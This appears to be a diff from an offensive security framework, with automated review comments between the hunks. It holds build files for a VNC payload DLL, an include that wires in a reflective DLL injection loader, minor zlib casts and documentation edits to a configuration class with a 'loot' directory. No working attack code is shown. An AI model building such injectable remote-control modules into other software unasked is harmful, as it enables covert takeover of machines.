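+<ClInclude Include="zlib\inffixed.h" />
+<ClInclude Include="zlib\inftrees.h" />
+<ClInclude Include="zlib\infutil.h" />
+<ClInclude Include="zlib\trees.h" />
+<ClInclude Include="zlib\zconf.h" />
+<ClInclude Include="zlib\zlib.h" />
+<ClInclude Include="zlib\zutil.h" />
+<ClInclude Include="AdministrationControls.h" />
+<ClInclude Include="d3des.h" />
+<ClInclude Include="DynamicFn.h" />
+<ClInclude Include="FileTransferItemInfo.h" />
+<ClInclude Include="IncomingConnectionsControls.h" />
+<ClInclude Include="InputHandlingControls.h" />
+<ClInclude Include="keysymdef.h" />
+<ClInclude Include="MatchWindow.h" />
+<ClInclude Include="MinMax.h" />
+<ClInclude Include="PollControls.h" />
+<ClInclude Include="QuerySettingsControls.h" />
+<ClInclude Include="RectList.h" />
+<ClInclude Include="resource.h" />
+<ClInclude Include="rfb.h" />
+<ClInclude Include="rfbproto.h" />
+<ClInclude Include="SharedDesktopArea.h" />
+<ClInclude Include="stdhdrs.h" />
+<ClInclude Include="translate.h" />
+<ClInclude Include="TsSessions.h" />
+<ClInclude Include="VideoDriver.h" />
+<ClInclude Include="vncAbout.h" />
+<ClInclude Include="vncauth.h" />
+<ClInclude Include="vncBuffer.h" />
+<ClInclude Include="vncClient.h" />
+<ClInclude Include="vncDesktop.h" />
+<ClInclude Include="vncEncodeCoRRE.h" />
+<ClInclude Include="vncEncodeHexT.h" />
+<ClInclude Include="vncEncoder.h" />
+<ClInclude Include="vncEncodeRRE.h" />
+<ClInclude Include="vncEncodeTight.h" />
+<ClInclude Include="vncEncodeZlib.h" />
+<ClInclude Include="vncEncodeZlibHex.h" />
+<ClInclude Include="vncInstHandler.h" />
+<ClInclude Include="vncKeymap.h" />
+<ClInclude Include="vncPasswd.h" />
+<ClInclude Include="vncRegion.h" />
+<ClInclude Include="vncServer.h" />
+<ClInclude Include="vncService.h" />
+<ClInclude Include="vncSockConnect.h" />
+<ClInclude Include="VSocket.h" />
+<ClInclude Include="VTypes.h" />
+<ClInclude Include="WallpaperUtils.h" />
+</ItemGroup>
+<ItemGroup>
+<Text Include="README.TXT" />
+</ItemGroup>
+<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+<ImportGroup Label="ExtensionTargets">
+</ImportGroup>
+</Project>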


@ -0,0 +1,527 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{804c711f-35c6-4aac-9b8a-9cf8b528de85}</UniqueIdentifier>
<Extensions>.cpp, .c</Extensions>
</Filter>
<Filter Include="Source Files\encoder">
<UniqueIdentifier>{7847cf33-fe03-48ad-9a94-a8956821f343}</UniqueIdentifier>
<Extensions>.cpp, .c</Extensions>
</Filter>
<Filter Include="Source Files\omnithread">
<UniqueIdentifier>{a328f948-40d7-4548-9451-66b620124477}</UniqueIdentifier>
</Filter>
<Filter Include="Source Files\libjpeg">
<UniqueIdentifier>{cb642898-1056-43ee-828a-40004b207331}</UniqueIdentifier>
</Filter>
<Filter Include="Source Files\zlib">
<UniqueIdentifier>{22b4b748-5baf-4a41-9ab0-ef1d45f215aa}</UniqueIdentifier>
</Filter>
<Filter Include="Source Files\winvnc">
<UniqueIdentifier>{2a00b2f1-2b80-496f-ade2-3ac76578d435}</UniqueIdentifier>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{c3a89192-29f8-4ebc-b443-1032d86966d6}</UniqueIdentifier>
<Extensions>.h</Extensions>
</Filter>
<Filter Include="Header Files\libjpeg">
<UniqueIdentifier>{a545ae04-19cc-401a-bb0e-fd3d7aad0f60}</UniqueIdentifier>
</Filter>
<Filter Include="Header Files\zlib">
<UniqueIdentifier>{525d33a4-2360-47f9-9e68-24f7d54d50cb}</UniqueIdentifier>
</Filter>
<Filter Include="Header Files\winvnc">
<UniqueIdentifier>{e0e45b7e-7137-4fa7-acb3-9c57acce4c9c}</UniqueIdentifier>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="vncdll.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="vncEncodeCoRRE.cpp">
<Filter>Source Files\encoder</Filter>
</ClCompile>
<ClCompile Include="vncEncodeHexT.cpp">
<Filter>Source Files\encoder</Filter>
</ClCompile>
<ClCompile Include="vncEncoder.cpp">
<Filter>Source Files\encoder</Filter>
</ClCompile>
<ClCompile Include="vncEncodeRRE.cpp">
<Filter>Source Files\encoder</Filter>
</ClCompile>
<ClCompile Include="vncEncodeTight.cpp">
<Filter>Source Files\encoder</Filter>
</ClCompile>
<ClCompile Include="vncEncodeZlib.cpp">
<Filter>Source Files\encoder</Filter>
</ClCompile>
<ClCompile Include="vncEncodeZlibHex.cpp">
<Filter>Source Files\encoder</Filter>
</ClCompile>
<ClCompile Include="omnithread\nt.cpp">
<Filter>Source Files\omnithread</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcapimin.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcapistd.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jccoefct.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jccolor.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcdctmgr.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jchuff.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcinit.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcmainct.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcmarker.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcmaster.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcomapi.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcparam.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcphuff.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcprepct.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcsample.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jctrans.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdapimin.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdapistd.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdatadst.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdatasrc.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdcoefct.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdcolor.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jddctmgr.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdhuff.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdinput.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdmainct.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdmarker.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdmaster.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdmerge.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdphuff.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdpostct.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdsample.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jdtrans.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jerror.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jfdctflt.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jfdctfst.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jfdctint.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jidctflt.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jidctfst.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jidctint.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jidctred.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jmemmgr.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jmemnobs.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jquant1.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jquant2.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jutils.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="zlib\adler32.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\compress.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\crc32.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\deflate.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\infblock.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\infcodes.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\inffast.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\inflate.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\inftrees.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\infutil.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\maketree.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\trees.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\uncompr.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="zlib\zutil.c">
<Filter>Source Files\zlib</Filter>
</ClCompile>
<ClCompile Include="d3des.c">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="DynamicFn.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="FileTransferItemInfo.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="MinMax.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="RectList.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="stdhdrs.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="tableinitcmtemplate.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="tableinittctemplate.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="tabletranstemplate.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="translate.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="TsSessions.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="VideoDriver.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncauth.c">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncBuffer.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncClient.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncDesktop.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncInstHandler.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncKeymap.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncRegion.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncServer.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncService.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="vncSockConnect.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="VSocket.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
<ClCompile Include="WallpaperUtils.cpp">
<Filter>Source Files\winvnc</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="omnithread\nt.h">
<Filter>Source Files\omnithread</Filter>
</ClInclude>
<ClInclude Include="omnithread\omnithread.h">
<Filter>Source Files\omnithread</Filter>
</ClInclude>
<ClInclude Include="common.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jchuff.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jconfig.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jdct.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jdhuff.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jerror.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jinclude.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jmemsys.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jmorecfg.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jpegint.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jpeglib.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="libjpeg\jversion.h">
<Filter>Header Files\libjpeg</Filter>
</ClInclude>
<ClInclude Include="zlib\deflate.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\infblock.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\infcodes.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\inffast.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\inffixed.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\inftrees.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\infutil.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\trees.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\zconf.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\zlib.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="zlib\zutil.h">
<Filter>Header Files\zlib</Filter>
</ClInclude>
<ClInclude Include="AdministrationControls.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="d3des.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="DynamicFn.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="FileTransferItemInfo.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="IncomingConnectionsControls.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="InputHandlingControls.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="keysymdef.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="MatchWindow.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="MinMax.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="PollControls.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="QuerySettingsControls.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="RectList.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="resource.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="rfb.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="rfbproto.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="SharedDesktopArea.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="stdhdrs.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="translate.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="TsSessions.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="VideoDriver.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncAbout.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncauth.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncBuffer.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncClient.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncDesktop.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncEncodeCoRRE.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncEncodeHexT.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncEncoder.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncEncodeRRE.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncEncodeTight.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncEncodeZlib.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncEncodeZlibHex.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncInstHandler.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncKeymap.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncPasswd.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncRegion.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncServer.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncService.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="vncSockConnect.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="VSocket.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="VTypes.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
<ClInclude Include="WallpaperUtils.h">
<Filter>Header Files\winvnc</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<Text Include="README.TXT">
<Filter>Header Files\winvnc</Filter>
</Text>
</ItemGroup>
</Project>

2
external/source/vncdll/winvnc/vncDesktop.cpp vendored Normal file → Executable file

@ -2906,7 +2906,7 @@ bool bDbgBmDump(
TCHAR szFileName[MAX_PATH];
sprintf(
szFileName,
"%04u.%02u.%02u-%02u-%02u-%02u-0x%08x.bmp",
"%04u.%02u.%02u-%02u-%02u-%02u-0x%08p.bmp",
stm.wYear, stm.wMonth, stm.wDay,
stm.wHour, stm.wMinute, stm.wSecond,
ptr);
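Review bot: The `0` flag is defined only for the numeric conversions, so `%08p` (the line that appears to be the new side) is undefined behaviour per the C standard even though MSVC accepts it; MSVC's `%p` already prints a fixed-width hex value, so `"%04u.%02u.%02u-%02u-%02u-%02u-0x%p.bmp"` is enough. Separately, the call writes with plain `sprintf` into `TCHAR szFileName[MAX_PATH]`: the fixed-width format cannot exceed MAX_PATH, but the `char*` format would no longer match the buffer if UNICODE were ever defined, and a bounded `_sntprintf_s`/`sprintf_s` would make the size limit explicit. bDbgBmDump's body continues outside the hunk.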

2
external/source/vncdll/winvnc/vncdll.cpp vendored Normal file → Executable file

@ -15,7 +15,7 @@
*/
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#include "ReflectiveLoader.c"
#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
HANDLE hMessageMutex = NULL;
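Review bot: The `#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"` line pulls a C source file into this translation unit through a path that resolves only inside this repository layout (external/source/ReflectiveDLLInjection relative to this file), so the build now silently tracks whatever revision of that tree is checked out rather than a local copy; a comment recording that intent would help the next update, e.g. `// Compiled from the shared external/source/ReflectiveDLLInjection tree; keep the two in sync`. The two `REFLECTIVEDLLINJECTION_*` defines immediately above presumably configure the included file and must stay before the include, which is worth stating in the same comment.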

2
external/source/vncdll/winvnc/zlib/inffast.c vendored Normal file → Executable file

@ -99,7 +99,7 @@ z_streamp z;
do {
r += s->end - s->window; /* force pointer in window */
} while (r < s->window); /* covers invalid distances */
e = s->end - r;
e = (uInt)(s->end - r);
if (c > e)
{
c -= e; /* wrapped copy */
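Review bot: The `(uInt)` cast on `e = (uInt)(s->end - r);` narrows a pointer difference (64-bit on x64) to 32 bits and only silences the warning; it is safe here because the `do { r += s->end - s->window; } while (r < s->window);` loop immediately above forces `r` inside the window, so a comment should record that: `/* r is inside the window (loop above), so the distance fits in uInt */`. More broadly, the presence of infblock/infcodes/inffast sources suggests a zlib 1.1.x-era tree being patched locally; local edits to a vendored library make it harder to pick up upstream fixes, so the upstream version and the set of local changes should be recorded next to the sources. The enclosing function starts outside the hunk.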

2
external/source/vncdll/winvnc/zlib/inflate.c vendored Normal file → Executable file

@ -334,7 +334,7 @@ z_streamp z;
}
/* restore */
z->total_in += p - z->next_in;
z->total_in += (uLong)(p - z->next_in);
z->next_in = p;
z->avail_in = n;
z->state->sub.marker = m;

2
external/source/vncdll/winvnc/zlib/infutil.h vendored Normal file → Executable file

@ -64,7 +64,7 @@ struct inflate_blocks_state {
/* defines for inflate input/output */
/* update pointers and return */
#define UPDBITS {s->bitb=b;s->bitk=k;}
#define UPDIN {z->avail_in=n;z->total_in+=p-z->next_in;z->next_in=p;}
#define UPDIN {z->avail_in=n;z->total_in+=(uLong)(p-z->next_in);z->next_in=p;}
#define UPDOUT {s->write=q;}
#define UPDATE {UPDBITS UPDIN UPDOUT}
#define LEAVE {UPDATE return inflate_flush(s,z,r);}


@ -3,22 +3,16 @@ require 'fileutils'
module Msf
###
#
# This class wraps interaction with global configuration that can be used as a
# persistent storage point for configuration, logs, and other such fun things.
#
###
class Config < Hash
#
# The installation root directory for the distribution
#
# The installation's root directory for the distribution
InstallRoot = File.expand_path(File.join(File.dirname(__FILE__), '..', '..', '..'))
#
# Determines the base configuration directory.
#
# @return [String] the base configuration directory
def self.get_config_root
# Use MSFCFGDIR environment variable first. See feature request #5797
@ -47,7 +41,11 @@ class Config < Hash
#
# Default values
#
# Default system file separator.
FileSep = File::SEPARATOR
# Default configuration locations.
Defaults =
{
'ConfigDirectory' => get_config_root,
@ -68,247 +66,260 @@ class Config < Hash
#
##
#
# Returns the framework installation root.
#
# @return [String] the framework installation root {InstallRoot}.
def self.install_root
InstallRoot
end
# Returns the configuration directory default.
#
# Calls the instance method.
#
# @return [String] the root configuration directory.
def self.config_directory
self.new.config_directory
end
# Returns the global module directory.
#
# Calls the instance method.
#
# @return [String] path to global module directory.
def self.module_directory
self.new.module_directory
end
# Returns the path that scripts can be loaded from.
#
# Calls the instance method.
#
# @return [String] path to script directory.
def self.script_directory
self.new.script_directory
end
# Returns the directory that log files should be stored in.
#
# Calls the instance method.
#
# @return [String] path to log directory.
def self.log_directory
self.new.log_directory
end
# Returns the directory that plugins are stored in.
#
# Calls the instance method.
#
# @return [String] path to plugin directory.
def self.plugin_directory
self.new.plugin_directory
end
# Returns the user-specific plugin base path
#
# Calls the instance method.
#
# @return [String] path to user-specific plugin directory.
def self.user_plugin_directory
self.new.user_plugin_directory
end
# Returns the directory in which session log files are to reside.
#
# Calls the instance method.
#
# @return [String] path to session log directory.
def self.session_log_directory
self.new.session_log_directory
end
# Returns the directory in which captured data will reside.
#
# Calls the instance method.
#
# @return [String] path to loot directory.
def self.loot_directory
self.new.loot_directory
end
# Returns the directory in which locally-generated data will reside.
#
# Calls the instance method.
#
# @return [String] path to locally-generated data directory.
def self.local_directory
self.new.local_directory
end
# Returns the user-specific module base path
#
# Calls the instance method.
#
# @return [String] path to user-specific modules directory.
def self.user_module_directory
self.new.user_module_directory
end
# Returns the user-specific script base path
#
# Calls the instance method.
#
# @return [String] path to user-specific script directory.
def self.user_script_directory
self.new.user_script_directory
end
# Returns the data directory
#
# Calls the instance method.
#
# @return [String] path to data directory.
def self.data_directory
self.new.data_directory
end
# Returns the full path to the configuration file.
#
# Calls the instance method.
#
# @return [String] path to the configuration file.
def self.config_file
self.new.config_file
end
# Returns the full path to the history file.
#
# Calls the instance method.
#
# @return [String] path the history file.
def self.history_file
self.new.history_file
end
# Initializes configuration, creating directories as necessary.
#
# Calls the instance method.
#
# @return [void]
def self.init
self.new.init
end
# Loads configuration from the supplied file path, or the default one if
# none is specified.
#
# Calls the instance method.
#
# @param path [String] the path to the configuration file.
# @return [Rex::Parser::Ini] INI file parser.
def self.load(path = nil)
self.new.load(path)
end
# Saves configuration to the path specified in the ConfigFile hash key or
# the default path if one isn't specified. The options should be group
# references that have named value pairs.
#
# Calls the instance method.
#
# @param opts [Hash] Hash containing configuration options.
# @option opts 'ConfigFile' [Hash] configuration file these options apply
# to.
# @return [void]
# @example Save 'Cat' => 'Foo' in group 'ExampleGroup'
# save(
# 'ExampleGroup' =>
# {
# 'Foo' => 'Cat'
# })
def self.save(opts)
self.new.save(opts)
end
#
# Updates the config class' self with the default hash.
#
# @return [Hash] the updated Hash.
def initialize
update(Defaults)
end
#
# Returns the installation root directory
#
# @return [String] the installation root directory {InstallRoot}.
def install_root
InstallRoot
end
#
# Returns the configuration directory default.
#
# @return [String] the root configuration directory.
def config_directory
self['ConfigDirectory']
end
#
# Returns the full path to the configuration file.
#
# @return [String] path to the configuration file.
def config_file
config_directory + FileSep + self['ConfigFile']
end
# Returns the full path to the history file.
#
# Returns the full path to the configuration file.
#
# @return [String] path the history file.
def history_file
config_directory + FileSep + "history"
end
#
# Returns the global module directory.
#
# @return [String] path to global module directory.
def module_directory
install_root + FileSep + self['ModuleDirectory']
end
#
# Returns the path that scripts can be loaded from.
#
# @return [String] path to script directory.
def script_directory
install_root + FileSep + self['ScriptDirectory']
end
#
# Returns the directory that log files should be stored in.
#
# @return [String] path to log directory.
def log_directory
config_directory + FileSep + self['LogDirectory']
end
#
# Returns the directory that plugins are stored in.
#
# @return [String] path to plugin directory.
def plugin_directory
install_root + FileSep + self['PluginDirectory']
end
#
# Returns the directory in which session log files are to reside.
#
# @return [String] path to session log directory.
def session_log_directory
config_directory + FileSep + self['SessionLogDirectory']
end
#
# Returns the directory in which captured data will reside.
#
# @return [String] path to loot directory.
def loot_directory
config_directory + FileSep + self['LootDirectory']
end
#
# Returns the directory in which locally-generated data will reside.
#
# @return [String] path to locally-generated data directory.
def local_directory
config_directory + FileSep + self['LocalDirectory']
end
#
# Returns the user-specific module base path
#
# @return [String] path to user-specific modules directory.
def user_module_directory
config_directory + FileSep + "modules"
end
#
# Returns the user-specific plugin base path
#
# @return [String] path to user-specific plugin directory.
def user_plugin_directory
config_directory + FileSep + "plugins"
end
#
# Returns the user-specific script base path
#
# @return [String] path to user-specific script directory.
def user_script_directory
config_directory + FileSep + "scripts"
end
#
# Returns the data directory
#
# @return [String] path to data directory.
def data_directory
install_root + FileSep + self['DataDirectory']
end
#
# Initializes configuration, creating directories as necessary.
#
# @return [void]
def init
FileUtils.mkdir_p(module_directory)
FileUtils.mkdir_p(config_directory)
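Review bot: `init` creates the configuration directory with `FileUtils.mkdir_p(config_directory)` and no explicit mode, so the directory that goes on to hold the history file, session logs and loot inherits the process umask and may be group- or world-readable on a shared host; creating it with `FileUtils.mkdir_p(config_directory, :mode => 0700)` (and likewise for the log, loot and session-log directories) would keep that data private to the user. The new YARD text for `history_file` also carries a typo, `@return [String] path the history file.`, which should read `@return [String] path to the history file.`. `init`'s body continues beyond the end of the hunk.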
@ -320,27 +331,31 @@ class Config < Hash
FileUtils.mkdir_p(user_plugin_directory)
end
#
# Loads configuration from the supplied file path, or the default one if
# none is specified.
#
# @param path [String] the path to the configuration file.
# @return [Rex::Parser::Ini] INI file parser.
def load(path = nil)
path = config_file if (!path)
return Rex::Parser::Ini.new(path)
end
#
# Saves configuration to the path specified in the ConfigFile hash key or
# the default path is one isn't specified. The options should be group
# references that have named value pairs. Example:
# the default path if one isn't specified. The options should be group
# references that have named value pairs.
#
